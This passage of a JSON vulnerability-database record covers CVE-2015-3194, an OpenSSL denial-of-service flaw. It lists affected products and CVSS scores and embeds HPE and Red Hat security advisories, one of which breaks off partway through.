"7.3.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.2" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.43" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.6" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "flashsystem 9846-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "93x5)" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.18" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.1" }, { "model": "websphere mq advanced message security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-8.0.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.4" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "bundle of g8264cs image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.7" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "ctpview 7.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "(comware r3113p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "19507)" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.12" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "forticache", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.2" }, { "model": "(comware r6710p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75005)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.9" }, { "model": "fortiwan", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014090801" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "oncommand unified manager for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "(comware r2111p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3600v25)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "(comware r1150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "129007)" }, { "model": "matrix operating environment", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "websphere mq for hp nonstop server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "305)" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "10.1-release-p25", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1.4.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mobile foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.6" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.2" }, { "model": "fortiddos", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.8" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "xcode", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "system networking rackswitch g8316", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.3" }, { "model": "secblade fw (comware r3181p07", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "4210g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "6125g/xg blade switch r2112p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.2" }, { "model": "system networking rackswitch g8124-e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.3" }, { "model": "oncommand unified manager host package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.6.0.4" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.9" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "virtual fabric 10gb switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.9.0" } ], "sources": [ { "db": "BID", "id": "78623" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.1.1", "versionStartIncluding": "5.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.9", "versionStartIncluding": "0.12.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.41", "versionStartIncluding": "0.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.3", "versionStartIncluding": "4.0.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-3194" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Lo\u0026amp;iuml;c Jonas Etienne(Qnective AG)", "sources": [ { "db": "BID", "id": "78623" } ], "trust": 0.3 }, "cve": "CVE-2015-3194", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-3194", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-3194", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-3194", "trust": 1.8, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2015-3194", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the affected application; denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c05157667\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05157667\nVersion: 1\n\nHPSBMU03607 rev.1 - HPE BladeSystem c-Class Virtual Connect (VC) Firmware,\nRemote Denial of Service (DoS), Disclosure of Information, Cross-Site Request\nForgery (CSRF)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-06-01\nLast Updated: 2016-06-01\n\nPotential Security Impact: Remote Cross-Site Request Forgery (CSRF), Denial\nof Service (DoS), Disclosure of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nMultiple potential security vulnerabilities have been identified in HPE\nBladeSystem c-Class Virtual Connect (VC) firmware. These vulnerabilities\ninclude:\n\nThe SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \nThe Cross-protocol Attack on TLS using SSLv2 also known as \"DROWN\", which\ncould be exploited remotely resulting in disclosure of information. \nAdditional OpenSSL and OpenSSH vulnerabilities which could be remotely\nexploited resulting in Denial of Service (DoS), disclosure of information, or\nCross-site Request Forgery (CSRF). \n\nReferences:\n\nCVE-2016-0800\nCVE-2016-0799\nCVE-2016-2842\nCVE-2015-1789\nCVE-2015-1791\nCVE-2015-3194\nCVE-2015-0705\nCVE-2015-5600\nCVE-2014-3566\nCVE-2008-5161\nSSRT102281\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nThe following firmware versions of Virtual Connect (VC) are impacted:\n\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21\n\nNote: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800,\nCVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and\nCVE-2016-2842. \n\nThe following products run the impacted versions of Virtual Connect (VC)\nfirmware:\n\nHPE VC Flex-10 10Gb Enet Module\nHPE Virtual Connect Flex-10/10D Module for c-Class BladeSystem\nHPE Virtual Connect FlexFabric 10Gb/24-port Module for c-Class BladeSystem\nHPE Virtual Connect FlexFabric-20/40 F8 Module for c-Class BladeSystem\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2016-0800 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-3194 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2008-5161 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6\nCVE-2015-0705 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2016-0799 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2016-2842 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE has provided an updated version of the BladeSystem c-Class Virtual\nConnect (VC) firmware to address these vulnerabilities. \n\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware v4.50\n\nThe update can be downloaded from: http://h20564.www2.hpe.com/hpsc/swd/public\n/detail?swItemId=MTX_1f352fb404f5410d9b2ca1b56d\n\nHISTORY\nVersion:1 (rev.1) - 1 June 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:2617-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2617.html\nIssue date: 2015-12-14\nCVE Names: CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nA NULL pointer derefernce flaw was found in the way OpenSSL verified\nsignatures using the RSA PSS algorithm. A remote attacked could possibly\nuse this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server\nusing OpenSSL if it enabled client authentication. (CVE-2015-3194)\n\nA memory leak 